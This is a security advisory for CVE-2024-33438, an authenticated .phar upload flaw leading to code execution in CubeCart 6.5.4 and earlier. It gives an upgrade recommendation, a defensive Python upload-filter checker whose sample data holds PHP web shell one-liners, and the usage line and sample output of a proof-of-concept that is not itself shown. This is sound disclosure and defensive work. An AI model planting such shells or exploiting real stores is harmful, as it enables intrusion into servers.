# Arbitrary File Upload Leads to RCE (CVE-2024-33438)
CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload issue that leads to remote code execution (RCE). The flaw is in the admin file manager: its upload filter does not reject `.phar` files, so an authenticated admin user can upload a `.phar` file containing PHP code and have the web server execute it. Upgrade to CubeCart 6.5.5, which ships the security patch for this issue.

For more details, please see the official announcement by CubeCart in the references.
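To make the filtering point concrete, below is an added Python example; it is not CubeCart's code and not the PoC. It contrasts a denylist filter of the kind that misses `.phar` (it knows only the usual PHP extensions) with an image-type allowlist, and adds a content check that flags a PHP open tag regardless of extension. The extension sets, the sample file names and the sample contents are constructed for illustration and are not taken from CubeCart.

```python
#!/usr/bin/env python3
"""Illustrative upload-filter check: denylist vs. allowlist, plus content sniffing.

Added example, not CubeCart code. The extension sets and sample files below
are assumptions made for the demonstration.
"""
import re
from pathlib import PurePosixPath

# A denylist of the kind that lets .phar through: it only knows the
# conventional PHP extensions (constructed for the example).
PHP_DENYLIST = {"php", "php3", "php4", "php5", "php7", "phtml"}

# What a shop image manager should accept instead (constructed for the example).
IMAGE_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "webp"}

# Matches "<?php" and the short echo tag "<?=", case-insensitively.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def extension(filename: str) -> str:
    """Return the final extension, lower-cased, without the dot ('' if none)."""
    return PurePosixPath(filename).suffix.lstrip(".").lower()


def denylist_allows(filename: str) -> bool:
    """Vulnerable pattern: accept anything not explicitly listed as PHP."""
    return extension(filename) not in PHP_DENYLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened pattern: accept only known-safe image extensions."""
    return extension(filename) in IMAGE_ALLOWLIST


def looks_like_php(content: bytes) -> bool:
    """Content check: does the file contain a PHP open tag anywhere?"""
    return PHP_OPEN_TAG.search(content) is not None


def audit_uploads(files):
    """files: iterable of (filename, bytes). Returns [(filename, reason), ...]
    for every file that fails the allowlist or contains PHP code."""
    findings = []
    for name, data in files:
        if not allowlist_allows(name):
            findings.append((name, f"extension '.{extension(name)}' not in image allowlist"))
        if looks_like_php(data):
            findings.append((name, "content contains a PHP open tag"))
    return findings


# Constructed sample upload set (not real files from any system).
SAMPLE_UPLOADS = [
    ("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ("shell.phar", b"<?php system($_GET['cmd']); ?>"),   # what the denylist misses
    ("shell.php", b"<?php system($_GET['cmd']); ?>"),    # what the denylist catches
    ("notes.PHAR", b"<?= shell_exec($_GET['c']) ?>"),    # case variant, short tag
    ("banner.jpg", b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>"),  # PHP hidden behind an allowed extension
]

if __name__ == "__main__":
    for name, data in SAMPLE_UPLOADS:
        print(f"{name:12} denylist={denylist_allows(name)!s:5} allowlist={allowlist_allows(name)!s:5} "
              f"php_tag={looks_like_php(data)}")
    print("audit findings:")
    for name, reason in audit_uploads(SAMPLE_UPLOADS):
        print(f"  {name}: {reason}")
```

The denylist passes `shell.phar` and `notes.PHAR` while rejecting `shell.php`, which is exactly the gap this advisory describes; the allowlist rejects both. The content check is the belt to the allowlist's braces: it still flags `banner.jpg`, whose extension is permitted but whose body carries a PHP tag, so it is also a reasonable post-incident sweep over an upload directory.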

## Exploit
An automated proof-of-concept (PoC) is provided, but the vulnerability can also be exploited manually by logging into the admin panel and uploading a malicious `.phar` file through the file manager.

Usage of the PoC (the last argument is the shell command to run on the target):

```
Usage: python3 <URL> <username> <password> <command>
```

Run against a test instance, the expected output for a successful exploitation looks like this:

```
python3 http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data
```

The `www-data` result shows that the command ran as the web server's user.

## References